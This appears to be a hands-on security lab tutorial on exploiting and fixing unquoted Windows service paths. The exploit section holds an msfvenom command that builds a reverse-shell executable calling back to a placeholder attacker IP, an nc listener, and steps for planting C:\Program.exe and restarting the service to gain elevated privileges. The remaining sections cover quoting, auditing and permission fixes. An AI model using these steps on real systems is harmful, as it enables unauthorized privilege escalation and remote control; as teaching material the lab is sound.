Objective: Understand how to identify and exploit unquoted service paths in Windows to execute malicious payloads with elevated privileges, and learn mitigation techniques to secure service configurations.
Scenario: Unquoted service paths in Windows can allow attackers to execute arbitrary code if the path to a service executable contains spaces and is not enclosed in quotes. Attackers can exploit this by placing a malicious executable in a directory along the unquoted path. Your task is to identify unquoted service paths, exploit them, and secure the system to prevent such vulnerabilities.
Lab Setup
- Environment:
- A Windows system with a service configured with an unquoted service path.
- Tools Required:
- Command Prompt or PowerShell.
- Access to the
sccommand. - A tool to create executables (e.g.,
msfvenom,PowerShell).
Lab Steps
Step 1: Identify Unquoted Service Paths
List all services:
sc queryCheck the configuration of a specific service for an unquoted path:
sc qc <service_name>Example output:
SERVICE_NAME: ExampleService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Example Service\service.exeIf the BINARY_PATH_NAME contains spaces and is not enclosed in quotes, it is vulnerable.
Step 2: Exploit the Unquoted Service Path
Identify possible injection points:
For the above example, Windows will search for executables in the following order:
C:\Program.exe
C:\Program Files\Example.exe
C:\Program Files\Example Service\service.exe
Create a malicious payload using msfvenom or another tool:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=<your_port> -f exe -o C:\Program.exeReplace <your_ip> and <your_port> with your attack machine’s IP and listening port.
Place the malicious executable in the highest-priority location (e.g., C:\Program.exe).
Restart the vulnerable service to trigger the exploit:
net stop <service_name>
net start <service_name>On your attack machine, set up a listener to catch the reverse shell:
nc -lvnp <your_port>Verify that the reverse shell connects and you have elevated privileges.
Step 3: Replace or Inject Malicious Executables
If you have write access to an executable already in the service path, replace it with a malicious payload.
copy malicious_payload.exe "C:\Program Files\Example.exe"Restart the service to trigger the exploit:
net stop <service_name>
net start <service_name>Solution
Explanation:
- Windows services with unquoted paths allow an attacker to place executables in locations searched by the service during startup.
- Exploiting this misconfiguration can provide elevated privileges if the service runs with SYSTEM or administrative permissions.
Prevention:
Quote Service Paths:
Edit the service configuration to enclose the path in quotes:
sc config <service_name> binPath= "C:\Program Files\Example Service\service.exe"Audit Services:
Regularly check for unquoted service paths using tools like PowerShell:
Get-WmiObject win32_service | Where-Object {$_.PathName -match ' '} | Select-Object Name, PathNameRestrict File System Permissions:
Ensure only authorized users can write to directories along the service path.
Monitor and Log Service Activity:
Use tools like Windows Event Viewer to track changes to services and unexpected service restarts.
Testing and Verification
Recheck the service configuration after mitigation to ensure the path is quoted:
sc qc <service_name>Attempt to place a malicious executable in the previously vulnerable locations and verify that it is no longer executed.
Document all changes and ensure compliance with security policies.
Reflection
This exercise demonstrates the risks associated with unquoted service paths in Windows and provides practical steps to exploit and secure such configurations. By completing this lab, you’ve gained valuable insights into detecting and mitigating this common Windows vulnerability.
0 Comments